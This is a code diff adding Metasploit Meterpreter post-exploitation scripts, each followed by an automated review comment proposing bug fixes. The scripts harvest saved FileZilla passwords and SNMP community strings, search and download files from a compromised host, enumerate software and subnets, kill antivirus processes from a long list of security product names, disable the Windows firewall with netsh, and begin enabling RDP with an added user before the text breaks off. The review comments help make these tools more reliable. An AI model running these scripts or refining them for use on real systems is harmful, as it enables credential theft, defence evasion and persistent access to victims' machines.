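+    keys.each do |k|
+      user_sid << k if k =~ /S-1-5-21-\d*-\d*-\d*-\d{3,6}$/
+    end
+    user_sid.each do |us|
+      mount_history = mount_history + enum_recent_mounts("HKU\\#{us.chomp}")
+      run_history = run_history + enum_run_unc("HKU\\#{us.chomp}")
+    end
+  end
+
+  # Enumerate Mount History
+  if mount_history.length > 0
+    print_status("Recent Mounts found:")
+    mount_history.each do |i|
+      print_status("\t#{i}")
+    end
+    print_status()
+  end
+
+  #Enumerate UNC Paths entered in the Dialog box
+  if run_history.length > 0
+    print_status("Recent UNC paths entered in Run Dialog found:")
+    run_history.each do |i|
+      print_status("\t#{i}")
+    end
+    print_status()
+  end
+else
+  print_error("This version of Meterpreter is not supported with this Script!")
+  raise Rex::Script::Completed
+end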
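Review bot: The platform guard `client.platform =~ /win32|64/` is looser than the `/win32|win64/` every other script in this commit uses: any platform string containing `64` passes, and the registry calls then fail on a non-Windows session instead of reaching the `print_error` branch. Change it to `if client.platform =~ /win32|win64/`. `enum_recent_mounts` also calls `.include?` on `registry_enumkeys(partial_path)` and `enum_conf_shares` calls `.length` on `registry_enumvals(shares_key)` with no nil guard; `Array(...)` around both keeps a missing key from raising `NoMethodError`. The mixed quoting in `partial_path` (`'\Software\\Microsoft\Windows\CurrentVersion\Explorer'`) happens to yield single backslashes because single-quoted strings leave `\S`, `\W`, `\C` and `\E` untouched, but it reads as a typo; the uniformly double-escaped form used in `enum_run_unc` just below is clearer.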

+ 87
- 0
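--- a/scripts/meterpreter/file_collector.rb
+++ b/scripts/meterpreter/file_collector.rb
@@ -0,0 +1,87 @@
+##
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
+# If you'd like to imporve this script, please try to port it as a post
+# module instead. Thank you.
+##
+
+
+# Author: Carlos Perez at carlos_perez[at]darkoperator.com
+#-------------------------------------------------------------------------------
+@client = client
+location = nil
+search_blob = []
+input_file = nil
+output_file = nil
+recurse = false
+logs = nil
+@opts = Rex::Parser::Arguments.new(
+  "-h" => [false, "Help menu." ],
+  "-i" => [true, "Input file with list of files to download, one per line."],
+  "-d" => [true, "Directory to start search on, search will be recursive."],
+  "-f" => [true, "Search blobs separated by a |."],
+  "-o" => [true, "Output File to save the full path of files found."],
+  "-r" => [false, "Search subdirectories."],
+  "-l" => [true, "Location where to save the files."]
+)
+# Function for displaying help message
+def usage
+  print_line "Meterpreter Script for searching and downloading files that"
+  print_line "match a specific pattern. First save files to a file, edit and"
+  print_line("use that same file to download the choosen files.")
+  print_line(@opts.usage)
+  raise Rex::Script::Completed
+end
+
+# Check that we are running under the right type of Meterpreter
+if client.platform =~ /win32|win64/
+  # Parse the options
+  if args.length > 0
+    @opts.parse(args) { |opt, idx, val|
+      case opt
+      when "-h"
+        usage
+      when "-i"
+        input_file = val
+      when "-o"
+        output_file = val
+      when "-d"
+        location = val
+      when "-f"
+        search_blob = val.split("|")
+      when "-r"
+        recurse = true
+      when "-l"
+        logs = val
+      end
+    }
+    # Search for files and save their location if specified
+    if search_blob.length > 0 and location
+      search_blob.each do |s|
+        print_status("Searching for #{s}")
+        results = @client.fs.file.search(location,s,recurse)
+        results.each do |file|
+          print_status("\t#{file['path']}\\#{file['name']} (#{file['size']} bytes)")
+          file_local_write(output_file,"#{file['path']}\\#{file['name']}") if output_file
+        end
+      end
+    end
+    # Read log file and download those files found
+    if input_file and logs
+      if ::File.exist?(input_file)
+        print_status("Reading file #{input_file}")
+        print_status("Downloading to #{logs}")
+        ::File.open(input_file, "r").each_line do |line|
+          print_status("\tDownloading #{line.chomp}")
+          @client.fs.file.download(logs, line.chomp)
+        end
+      else
+        print_error("File #{input_file} does not exist!")
+      end
+    end
+  else
+    usage
+  end
+else
+  print_error("This version of Meterpreter is not supported with this Script!")
+  raise Rex::Script::Completed
+end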
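Review bot: `::File.open(input_file, "r").each_line` never closes the handle, because the non-block form of `File.open` just returns the `File` object; `::File.foreach(input_file) do |line|` iterates and closes it for you. The `-d` help text says the search "will be recursive", but `recurse` stays `false` unless `-r` is given, so the two option descriptions contradict each other; drop the clause from `-d` (`"-d" => [true, "Directory to start search on."]`). `search_blob.length > 0 and location` uses `and`, whose low precedence is a well-known trap in Ruby conditions; `!search_blob.empty? && location` says the same thing safely, and `input_file and logs` on the next block has the same issue.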

+ 70
- 0
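--- a/scripts/meterpreter/get_application_list.rb
+++ b/scripts/meterpreter/get_application_list.rb
@@ -0,0 +1,70 @@
+##
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
+# If you'd like to imporve this script, please try to port it as a post
+# module instead. Thank you.
+##
+
+
+# Meterpreter script for listing installed applications and their version.
+# Provided: carlos_perez[at]darkoperator[dot]com
+
+#Options and Option Parsing
+opts = Rex::Parser::Arguments.new(
+  "-h" => [ false, "Help menu." ]
+)
+
+def app_list
+  tbl = Rex::Text::Table.new(
+    'Header'  => "Installed Applications",
+    'Indent'  => 1,
+    'Columns' => [
+      "Name",
+      "Version"
+    ])
+  appkeys = ['HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall',
+    'HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall' ]
+  threadnum = 0
+  a = []
+  appkeys.each do |keyx86|
+    soft_keys = registry_enumkeys(keyx86)
+    if soft_keys
+      soft_keys.each do |k|
+        if threadnum < 10
+          a.push(::Thread.new {
+              begin
+                dispnm = registry_getvaldata("#{keyx86}\\#{k}","DisplayName")
+                dispversion = registry_getvaldata("#{keyx86}\\#{k}","DisplayVersion")
+                if dispnm =~ /\S*/
+                  tbl << [dispnm,dispversion]
+                end
+              rescue
+              end
+            })
+          threadnum += 1
+        else
+          sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
+          threadnum = 0
+        end
+      end
+    end
+
+
+  end
+  print_line("\n" + tbl.to_s + "\n")
+end
+
+opts.parse(args) { |opt, idx, val|
+  case opt
+  when "-h"
+    print_line "Meterpreter Script for extracting a list installed applications and their version."
+    print_line(opts.usage)
+    raise Rex::Script::Completed
+
+  end
+}
+if client.platform =~ /win32|win64/
+  app_list
+else
+  print_error("This version of Meterpreter is not supported with this Script!")
+  raise Rex::Script::Completed
+end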
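Review bot: The thread batching in app_list silently drops an Uninstall subkey every time the cap is hit: once `threadnum` reaches 10 the `else` branch waits for the batch and resets the counter but never schedules the current `k`, so the 11th, 22nd, … entries of each hive are omitted from the table. The last batch is also never joined, so `print_line("\n" + tbl.to_s + "\n")` can run while threads are still appending rows, and `tbl <<` from several threads assumes Rex::Text::Table tolerates concurrent appends, which I would not rely on. The guard `if dispnm =~ /\S*/` always matches because `\S*` accepts the empty string; `if dispnm =~ /\S/` is what was intended. The restructured loop below waits before scheduling instead of instead of scheduling, and joins the remaining threads before printing.
```ruby
      soft_keys.each do |k|
        if threadnum >= 10
          # drain the running batch first so this key is still scheduled
          sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
          threadnum = 0
        end
        a.push(::Thread.new {
            # … unchanged: DisplayName/DisplayVersion lookup and tbl << …
          })
        threadnum += 1
      end
    end
  end
  a.each(&:join) # the last batch is otherwise still running when the table is printed
  print_line("\n" + tbl.to_s + "\n")
```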

+ 177
- 0
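--- a/scripts/meterpreter/get_filezilla_creds.rb
+++ b/scripts/meterpreter/get_filezilla_creds.rb
@@ -0,0 +1,177 @@
+##
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
+# If you'd like to imporve this script, please try to port it as a post
+# module instead. Thank you.
+##
+
+
+require "rexml/document"
+
+#-------------------------------------------------------------------------------
+#Options and Option Parsing
+opts = Rex::Parser::Arguments.new(
+  "-h" => [ false, "Help menu." ],
+  "-c" => [ false, "Return credentials." ]
+)
+
+get_credentials=false
+
+opts.parse(args) { |opt, idx, val|
+  case opt
+  when "-h"
+    print_line "Meterpreter Script for extracting servers and credentials from Filezilla."
+    print_line(opts.usage)
+    raise Rex::Script::Completed
+  when "-c"
+    get_credentials=true
+  end
+}
+### If we get here and have none of our flags true, then we'll just
+###   get credentials
+if !(get_credentials)
+  get_credentials=true
+end
+
+#-------------------------------------------------------------------------------
+#Set General Variables used in the script
+@client = client
+os = @client.sys.config.sysinfo['OS']
+host = @client.sys.config.sysinfo['Computer']
+# Create Filename info to be appended to downloaded files
+filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
+# Create a directory for the logs
+logs = ::File.join(Msf::Config.log_directory, 'filezilla', Rex::FileUtils.clean_path(host + filenameinfo) )
+# Create the log directory
+::FileUtils.mkdir_p(logs)
+#logfile name
+dest = Rex::FileUtils.clean_path(logs + "/" + host + filenameinfo + ".txt")
+
+#-------------------------------------------------------------------------------
+#function for checking of FileZilla profile is present
+def check_filezilla(path)
+  found = nil
+  @client.fs.dir.foreach(path) do |x|
+    next if x =~ /^(\.|\.\.)$/
+    if x =~ (/FileZilla/)
+      ### If we find the path, let's return it
+      found = path + x
+      return found
+    end
+  end
+  return found
+end
+
+#-------------------------------------------------------------------------------
+
+def extract_saved_creds(path,xml_file)
+  accounts_xml = ""
+  creds = ""
+  print_status("Reading #{xml_file} file...")
+  ### modified to use pidgin_path, which already has .purple in it
+  account_file = @client.fs.file.new(path + "\\#{xml_file}", "rb")
+  until account_file.eof?
+    accounts_xml << account_file.read
+  end
+  account_file.close
+  doc = (REXML::Document.new accounts_xml).root
+  doc.elements.to_a("//Server").each do |e|
+    print_status "\tHost: #{e.elements["Host"].text}"
+    creds << "Host: #{e.elements["Host"].text}"
+    print_status "\tPort: #{e.elements["Port"].text}"
+    creds << "Port: #{e.elements["Port"].text}"
+    logon_type = e.elements["Logontype"].text
+    if logon_type == "0"
+      print_status "\tLogon Type: Anonymous"
+      creds << "Logon Type: Anonymous"
+    elsif logon_type =~ /1|4/
+      print_status "\tUser: #{e.elements["User"].text}"
+      creds << "User: #{e.elements["User"].text}"
+      print_status "\tPassword: #{e.elements["Pass"].text}"
+      creds << "Password: #{e.elements["Pass"].text}"
+    elsif logon_type =~ /2|3/
+      print_status "\tUser: #{e.elements["User"].text}"
+      creds << "User: #{e.elements["User"].text}"
+    end
+
+    proto = e.elements["Protocol"].text
+    if  proto == "0"
+      print_status "\tProtocol: FTP"
+      creds << "Protocol: FTP"
+    elsif proto == "1"
+      print_status "\tProtocol: SSH"
+      creds << "Protocol: SSH"
+    elsif proto == "3"
+      print_status "\tProtocol: FTPS"
+      creds << "Protocol: FTPS"
+    elsif proto == "4"
+      print_status "\tProtocol: FTPES"
+      creds << "Protocol: FTPES"
+    end
+    print_status ""
+    creds << ""
+
+  end
+#
+  return creds
+end
+#-------------------------------------------------------------------------------
+#Function to enumerate the users if running as SYSTEM
+def enum_users(os)
+  users = []
+
+  path4users = ""
+  sysdrv = @client.sys.config.getenv('SystemDrive')
+
+  if os =~ /7|Vista|2008/
+    path4users = sysdrv + "\\users\\"
+    path2purple = "\\AppData\\Roaming\\"
+  else
+    path4users = sysdrv + "\\Documents and Settings\\"
+    path2purple = "\\Application Data\\"
+  end
+
+  if is_system?
+    print_status("Running as SYSTEM extracting user list..")
+    @client.fs.dir.foreach(path4users) do |u|
+      userinfo = {}
+      next if u =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
+      userinfo['username'] = u
+      userinfo['userappdata'] = path4users + u + path2purple
+      users << userinfo
+    end
+  else
+    userinfo = {}
+    uservar = @client.sys.config.getenv('USERNAME')
+    userinfo['username'] = uservar
+    userinfo['userappdata'] = path4users + uservar + path2purple
+    users << userinfo
+  end
+  return users
+end
+
+################## MAIN ##################
+if client.platform =~ /win32|win64/
+  print_status("Running Meterpreter FileZilla Credential harvester script")
+  print_status("All services are logged at #{dest}")
+  enum_users(os).each do |u|
+    print_status("Checking if Filezilla profile is present for user :::#{u['username']}:::...")
+    ### Find the path (if it exists) for this user,
+    filezilla_path = check_filezilla(u['userappdata'])
+    if filezilla_path
+      print_status("FileZilla profile found!")
+      ### modified to use filezilla_path
+      xml_cfg_files = ['sitemanager.xml','recentservers.xml']
+      if get_credentials
+        xml_cfg_files.each do |xml_cfg_file|
+          file_local_write(dest,extract_saved_creds(filezilla_path,xml_cfg_file))
+        end
+      end
+
+    else
+      print_error("Filezilla profile not found!")
+    end
+  end
+else
+  print_error("This version of Meterpreter is not supported with this Script!")
+  raise Rex::Script::Completed
+end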
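Review bot: extract_saved_creds accumulates `creds` with `<<` and never appends a line terminator, so every field of every <Server> in a file runs together into one string before it reaches file_local_write, and the intended separator `creds << ""` at the end of each entry appends nothing. Each append should end in `\n`, e.g. `creds << "Host: #{e.elements["Host"].text}\n"`, with `creds << "\n"` as the per-server separator. The `e.elements["Host"].text` chains also raise NoMethodError on any <Server> that lacks one of the elements, which aborts the whole file rather than skipping the entry; `e.elements["Host"]&.text` (or a `next unless`) would make the loop tolerant. The comment `### modified to use pidgin_path, which already has .purple in it` above the file open is left over from the Pidgin script this was copied from and should be reworded to describe the FileZilla path. In enum_users, `os =~ /7|Vista|2008/` decides the profile layout from the sysinfo string, so OS names that match neither branch fall into the "Documents and Settings" layout; worth a comment or a broader match if this is still meant to run on newer systems.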

+ 35
- 0
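--- a/scripts/meterpreter/get_local_subnets.rb
+++ b/scripts/meterpreter/get_local_subnets.rb
@@ -0,0 +1,35 @@
+##
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
+# If you'd like to imporve this script, please try to port it as a post
+# module instead. Thank you.
+##
+
+
+# Meterpreter script that display local subnets
+# Provided by Nicob <nicob [at] nicob.net>
+# Ripped from http://blog.metasploit.com/2006/10/meterpreter-scripts-and-msrt.html
+
+@@exec_opts = Rex::Parser::Arguments.new(
+  "-h" => [ false, "Help menu." ]
+)
+def usage
+  print_line("Get a list of local subnets based on the host's routes")
+  print_line("USAGE: run get_local_subnets")
+  print_line(@@exec_opts.usage)
+  raise Rex::Script::Completed
+end
+
+@@exec_opts.parse(args) { |opt, idx, val|
+  case opt
+  when "-h"
+    usage
+  end
+}
+
+client.net.config.each_route { |route|
+  # Remove multicast and loopback interfaces
+  next if route.subnet =~ /^(224\.|127\.)/
+  next if route.subnet == '0.0.0.0'
+  next if route.netmask == '255.255.255.255'
+  print_line("Local subnet: #{route.subnet}/#{route.netmask}")
+}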
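Review bot: The filter `next if route.subnet =~ /^(224\.|127\.)/` excludes only 224.0.0.0/8, while the comment above it promises to drop multicast routes; the multicast block is 224.0.0.0/4, so routes in 225.x–239.x are still printed as local subnets. `next if route.subnet =~ /\A(22[4-9]|23[0-9]|127)\./` covers the whole range and anchors with `\A` instead of the per-line `^`. As a point of style, `@@exec_opts` is a class variable where the sibling scripts in this commit (get_application_list, get_filezilla_creds) use a plain local `opts`; the local is the form to follow.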

+ 64
- 0
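--- a/scripts/meterpreter/get_valid_community.rb
+++ b/scripts/meterpreter/get_valid_community.rb
@@ -0,0 +1,64 @@
+##
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
+# If you'd like to imporve this script, please try to port it as a post
+# module instead. Thank you.
+##
+
+
+#copied getvncpw - thanks grutz/carlos
+
+session = client
+
+@@exec_opts = Rex::Parser::Arguments.new(
+  "-h" => [ false, "Help menu."]
+)
+
+def usage()
+  print("\nPull the SNMP community string from a Windows Meterpreter session\n\n")
+  completed
+end
+
+def get_community(session)
+  key = "HKLM\\System\\CurrentControlSet\\Services\\SNMP\\Parameters\\ValidCommunities"
+  root_key, base_key = session.sys.registry.splitkey(key)
+  open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ)
+  begin
+    # oddly enough this does not return the data field which indicates ro/rw
+    return open_key.enum_value.collect {|x| x.name}
+  rescue
+    # no registry key found or other error
+    return nil
+  end
+end
+
+@@exec_opts.parse(args) { |opt, idx, val|
+  case opt
+  when "-h"
+    usage
+  end
+}
+
+if client.platform =~ /win32|win64/
+  print_status("Searching for community strings...")
+  strs = get_community(session)
+  if strs
+    strs.each do |str|
+      print_good("FOUND: #{str}")
+      @client.framework.db.report_auth_info(
+        :host	=> client.sock.peerhost,
+        :port	=> 161,
+        :proto	=> 'udp',
+        :sname	=> 'snmp',
+        :user	=> '',
+        :pass	=> str,
+        :type	=> "snmp.community",
+        :duplicate_ok	=> true
+      )
+    end
+  else
+    print_status("Not found")
+  end
+else
+  print_error("This version of Meterpreter is not supported with this Script!")
+  raise Rex::Script::Completed
+end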
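Review bot: In get_community the `open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ)` call sits above the `begin`, so a missing ValidCommunities key raises out of the method instead of returning nil as the `# no registry key found or other error` comment claims; moving that line inside the `begin` makes the rescue cover it. The rescue is also bare, so an access-denied failure is indistinguishable from an absent key; a `print_error("#{$!.class}: #{$!}")` before `return nil` keeps the "Not found" message honest. `usage` ends with `completed` where every other script here does `raise Rex::Script::Completed`; if `completed` is not a helper the script runner provides, `-h` ends in NameError, so it is worth aligning with the siblings. The reporting call goes through `@client`, which this script never assigns (it uses `session` and `client` elsewhere), so it relies on the runner having set that instance variable — a `@client = client` next to `session = client`, as get_filezilla_creds does, would remove the dependency.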

+ 381
- 0
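--- a/scripts/meterpreter/getcountermeasure.rb
+++ b/scripts/meterpreter/getcountermeasure.rb
@@ -0,0 +1,381 @@
+##
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
+# If you'd like to imporve this script, please try to port it as a post
+# module instead. Thank you.
+##
+
+
+#
+# Meterpreter script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration.
+# Provides also the option to kill the processes of detected products and disable the built-in firewall.
+# Provided by Carlos Perez at carlos_perez[at]darkoperator.com
+# Version: 0.1.0
+session = client
+@@exec_opts = Rex::Parser::Arguments.new(
+  "-h" => [ false, "Help menu." ],
+  "-k" => [ false, "Kill any AV, HIPS and Third Party Firewall process found." ],
+  "-d" => [ false, "Disable built in Firewall" ]
+)
+
+def usage
+  print_line("Getcountermeasure -- List (or optionally, kill) HIPS and AV")
+  print_line("processes, show XP firewall rules, and display DEP and UAC")
+  print_line("policies")
+  print(@@exec_opts.usage)
+  raise Rex::Script::Completed
+end
+
+#-------------------------------------------------------------------------------
+avs = %W{
+  a2adguard.exe
+  a2adwizard.exe
+  a2antidialer.exe
+  a2cfg.exe
+  a2cmd.exe
+  a2free.exe
+  a2guard.exe
+  a2hijackfree.exe
+  a2scan.exe
+  a2service.exe
+  a2start.exe
+  a2sys.exe
+  a2upd.exe
+  aavgapi.exe
+  aawservice.exe
+  aawtray.exe
+  ad-aware.exe
+  ad-watch.exe
+  alescan.exe
+  anvir.exe
+  ashdisp.exe
+  ashmaisv.exe
+  ashserv.exe
+  ashwebsv.exe
+  aswupdsv.exe
+  atrack.exe
+  avgagent.exe
+  avgamsvr.exe
+  avgcc.exe
+  avgctrl.exe
+  avgemc.exe
+  avgnt.exe
+  avgtcpsv.exe
+  avguard.exe
+  avgupsvc.exe
+  avgw.exe
+  avkbar.exe
+  avk.exe
+  avkpop.exe
+  avkproxy.exe
+  avkservice.exe
+  avktray
+  avktray.exe
+  avkwctl
+  avkwctl.exe
+  avmailc.exe
+  avp.exe
+  avpm.exe
+  avpmwrap.exe
+  avsched32.exe
+  avwebgrd.exe
+  avwin.exe
+  avwupsrv.exe
+  avz.exe
+  bdagent.exe
+  bdmcon.exe
+  bdnagent.exe
+  bdss.exe
+  bdswitch.exe
+  blackd.exe
+  blackice.exe
+  blink.exe
+  boc412.exe
+  boc425.exe
+  bocore.exe
+  bootwarn.exe
+  cavrid.exe
+  cavtray.exe
+  ccapp.exe
+  ccevtmgr.exe
+  ccimscan.exe
+  ccproxy.exe
+  ccpwdsvc.exe
+  ccpxysvc.exe
+  ccsetmgr.exe
+  cfgwiz.exe
+  cfp.exe
+  clamd.exe
+  clamservice.exe
+  clamtray.exe
+  cmdagent.exe
+  cpd.exe
+  cpf.exe
+  csinsmnt.exe
+  dcsuserprot.exe
+  defensewall.exe
+  defensewall_serv.exe
+  defwatch.exe
+  f-agnt95.exe
+  fpavupdm.exe
+  f-prot95.exe
+  f-prot.exe
+  fprot.exe
+  fsaua.exe
+  fsav32.exe
+  f-sched.exe
+  fsdfwd.exe
+  fsm32.exe
+  fsma32.exe
+  fssm32.exe
+  f-stopw.exe
+  f-stopw.exe
+  fwservice.exe
+  fwsrv.exe
+  iamstats.exe
+  iao.exe
+  icload95.exe
+  icmon.exe
+  idsinst.exe
+  idslu.exe
+  inetupd.exe
+  irsetup.exe
+  isafe.exe
+  isignup.exe
+  issvc.exe
+  kav.exe
+  kavss.exe
+  kavsvc.exe
+  klswd.exe
+  kpf4gui.exe
+  kpf4ss.exe
+  livesrv.exe
+  lpfw.exe
+  mcagent.exe
+  mcdetect.exe
+  mcmnhdlr.exe
+  mcrdsvc.exe
+  mcshield.exe
+  mctskshd.exe
+  mcvsshld.exe
+  mghtml.exe
+  mpftray.exe
+  msascui.exe
+  mscifapp.exe
+  msfwsvc.exe
+  msgsys.exe
+  msssrv.exe
+  navapsvc.exe
+  navapw32.exe
+  navlogon.dll
+  navstub.exe
+  navw32.exe
+  nisemsvr.exe
+  nisum.exe
+  nmain.exe
+  noads.exe
+  nod32krn.exe
+  nod32kui.exe
+  nod32ra.exe
+  npfmntor.exe
+  nprotect.exe
+  nsmdtr.exe
+  oasclnt.exe
+  ofcdog.exe
+  opscan.exe
+  ossec-agent.exe
+  outpost.exe
+  paamsrv.exe
+  pavfnsvr.exe
+  pcclient.exe
+  pccpfw.exe
+  pccwin98.exe
+  persfw.exe
+  protector.exe
+  qconsole.exe
+  qdcsfs.exe
+  rtvscan.exe
+  sadblock.exe
+  safe.exe
+  sandboxieserver.exe
+  savscan.exe
+  sbiectrl.exe
+  sbiesvc.exe
+  sbserv.exe
+  scfservice.exe
+  sched.exe
+  schedm.exe
+  scheduler daemon.exe
+  sdhelp.exe
+  serv95.exe
+  sgbhp.exe
+  sgmain.exe
+  slee503.exe
+  smartfix.exe
+  smc.exe
+  snoopfreesvc.exe
+  snoopfreeui.exe
+  spbbcsvc.exe
+  sp_rsser.exe
+  spyblocker.exe
+  spybotsd.exe
+  spysweeper.exe
+  spysweeperui.exe
+  spywareguard.dll
+  spywareterminatorshield.exe
+  ssu.exe
+  steganos5.exe
+  stinger.exe
+  swdoctor.exe
+  swupdate.exe
+  symlcsvc.exe
+  symundo.exe
+  symwsc.exe
+  symwscno.exe
+  tcguard.exe
+  tds2-98.exe
+  tds-3.exe
+  teatimer.exe
+  tgbbob.exe
+  tgbstarter.exe
+  tsatudt.exe
+  umxagent.exe
+  umxcfg.exe
+  umxfwhlp.exe
+  umxlu.exe
+  umxpol.exe
+  umxtray.exe
+  usrprmpt.exe
+  vetmsg9x.exe
+  vetmsg.exe
+  vptray.exe
+  vsaccess.exe
+  vsserv.exe
+  wcantispy.exe
+  win-bugsfix.exe
+  winpatrol.exe
+  winpatrolex.exe
+  wrsssdk.exe
+  xcommsvr.exe
+  xfr.exe
+  xp-antispy.exe
+  zegarynka.exe
+  zlclient.exe
+}
+#-------------------------------------------------------------------------------
+# Check for the presence of AV, HIPS and Third Party firewall and/or kill the
+# processes associated with it
+def check(session,avs,killbit)
+  print_status("Checking for contermeasures...")
+  session.sys.process.get_processes().each do |x|
+    if (avs.index(x['name'].downcase))
+      print_status("\tPossible countermeasure found #{x['name']} #{x['path']}")
+      if (killbit)
+        print_status("\tKilling process for countermeasure.....")
+        session.sys.process.kill(x['pid'])
+      end
+    end
+  end
+end
+#-------------------------------------------------------------------------------
+# Get the configuration and/or disable the built in Windows Firewall
+def checklocalfw(session,killfw)
+  print_status("Getting Windows Built in Firewall configuration...")
+  opmode = ""
+  r = session.sys.process.execute("cmd.exe /c netsh firewall show opmode", nil, {'Hidden' => 'true', 'Channelized' => true})
+  while(d = r.channel.read)
+    opmode << d
+  end
+  r.channel.close
+  r.close
+  opmode.split("\n").each do |o|
+    print_status("\t#{o}")
+  end
+  if (killfw)
+    print_status("Disabling Built in Firewall.....")
+    f = session.sys.process.execute("cmd.exe /c netsh firewall set opmode mode=DISABLE", nil, {'Hidden' => 'true','Channelized' => true})
+    while(d = f.channel.read)
+      if d =~ /The requested operation requires elevation./
+        print_status("\tUAC or Insufficient permissions prevented the disabling of Firewall")
+      end
+    end
+    f.channel.close
+    f.close
+  end
+end
+#-------------------------------------------------------------------------------
+# Function for getting the current DEP Policy on the Windows Target
+def checkdep(session)
+  tmpout = ""
+  depmode = ""
+  # Expand environment %TEMP% variable
+  tmp = session.sys.config.getenv('TEMP')
+  # Create random name for the wmic output
+  wmicfile = sprintf("%.5d",rand(100000))
+  wmicout = "#{tmp}\\#{wmicfile}"
+  print_status("Checking DEP Support Policy...")
+  r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmicout} OS Get DataExecutionPrevention_SupportPolicy", nil, {'Hidden' => true})
+  sleep(2)
+  r.close
+  r = session.sys.process.execute("cmd.exe /c type #{wmicout}", nil, {'Hidden' => 'true','Channelized' => true})
+    while(d = r.channel.read)
+      tmpout << d
+    end
+  r.channel.close
+  r.close
+  session.sys.process.execute("cmd.exe /c del #{wmicout}", nil, {'Hidden' => true})
+  depmode = tmpout.scan(/(\d)/)
+  if depmode.to_s == "0"
+    print_status("\tDEP is off for the whole system.")
+  elsif depmode.to_s == "1"
+    print_status("\tFull DEP coverage for the whole system with no exceptions.")
+  elsif depmode.to_s == "2"
+    print_status("\tDEP is limited to Windows system binaries.")
+  elsif depmode.to_s == "3"
+    print_status("\tDEP is on for all programs and services.")
+  end
+
+end
+#-------------------------------------------------------------------------------
+def checkuac(session)
+  print_status("Checking if UAC is enabled ...")
+  key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'
+  root_key, base_key = session.sys.registry.splitkey(key)
+  value = "EnableLUA"
+  open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)
+  v = open_key.query_value(value)
+  if v.data == 1
+    print_status("\tUAC is Enabled")
+  else
+    print_status("\tUAC is Disabled")
+  end
+end
+
+################## MAIN ##################
+killbt = false
+killfw = false
+@@exec_opts.parse(args) { |opt, idx, val|
+  case opt
+  when "-k"
+    killbt = true
+  when "-d"
+    killfw = true
+  when "-h"
+    usage
+  end
+}
+# get the version of windows
+if client.platform =~ /win32|win64/
+  wnvr = session.sys.config.sysinfo["OS"]
+  print_status("Running Getcountermeasure on the target...")
+  check(session,avs,killbt)
+  if wnvr !~ /Windows 2000/
+    checklocalfw(session, killfw)
+    checkdep(session)
+  end
+  if wnvr =~ /Windows Vista/
+    checkuac(session)
+  end
+else
+  print_error("This version of Meterpreter is not supported with this Script!")
+  raise Rex::Script::Completed
+end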
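Review bot: checkdep can no longer report a DEP policy: `depmode = tmpout.scan(/(\d)/)` yields a nested array, and on Ruby 1.9+ `depmode.to_s` is its inspect form (`[["3"]]`), so none of the `== "0"` … `== "3"` comparisons match and the function prints nothing — the code only worked when Array#to_s joined elements. `depmode = tmpout[/\d/]` (or `tmpout.scan(/\d/).first`) gives the digit directly, and an `else` branch printing `tmpout.strip` would surface the unparsed output instead of silence. The `sleep(2)` between the `wmic /append` launch and the `type` read is a race on a slow host and leaves the temp file behind if `del` fails; if wmic output can be read over a channelized process as checklocalfw does for netsh, both the sleep and the temp file go away. In the `avs` list, `%W{}` splits on whitespace, so `scheduler daemon.exe` becomes the two entries `scheduler` and `daemon.exe`, and `f-stopw.exe` appears twice — quoting the former and dropping the duplicate keeps the match list accurate.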

+ 190
- 0
scripts/meterpreter/getgui.rb View File

@@ -0,0 +1,190 @@
1
+##
2
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
+# If you'd like to imporve this script, please try to port it as a post
4
+# module instead. Thank you.
5
+##
6
+
7
+
8
+# Author: Carlos Perez at carlos_perez[at]darkoperator.com
9
+#-------------------------------------------------------------------------------
10
+################## Variable Declarations ##################
11
+
12
+session = client
13
+host_name = client.sys.config.sysinfo['Computer']
14
+# Create Filename info to be appended to downloaded files
15
+filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
16
+
17
+# Create a directory for the logs
18
+logs = ::File.join(Msf::Config.log_directory,'scripts', 'getgui')
19
+
20
+# Create the log directory
21
+::FileUtils.mkdir_p(logs)
22
+
23
+# Cleaup script file name
24
+@dest = logs + "/clean_up_" + filenameinfo + ".rc"
25
+
26
+@@exec_opts = Rex::Parser::Arguments.new(
27
+  "-h" => [ false, "Help menu." ],
28
+  "-e" => [ false, "Enable RDP only." ],
29
+  "-p" => [ true,  "The Password of the user to add." ],
30
+  "-u" => [ true,  "The Username of the user to add." ],
31
+  "-f" => [ true,  "Forward RDP Connection." ]
32
+)
33
+def usage
34
+  print_line("Windows Remote Desktop Enabler Meterpreter Script")
35
+  print_line("Usage: getgui -u <username> -p <password>")
36
+  print_line("Or:    getgui -e")
37
+  print(@@exec_opts.usage)
38
+  raise Rex::Script::Completed
39
+end
40
+
41
+
42
+
43
+
44
+def enablerd()
45
+  key = 'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server'
46
+  value = "fDenyTSConnections"
47
+  begin
48
+    v = registry_getvaldata(key,value)
49
+    print_status "Enabling Remote Desktop"
50
+    if v == 1
51
+      print_status "\tRDP is disabled; enabling it ..."
52
+      registry_setvaldata(key,value,0,"REG_DWORD")
53
+      file_local_write(@dest,"reg setval -k \'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\' -v 'fDenyTSConnections' -d \"1\"")
54
+    else
55
+      print_status "\tRDP is already enabled"
56
+    end
57
+  rescue::Exception => e
58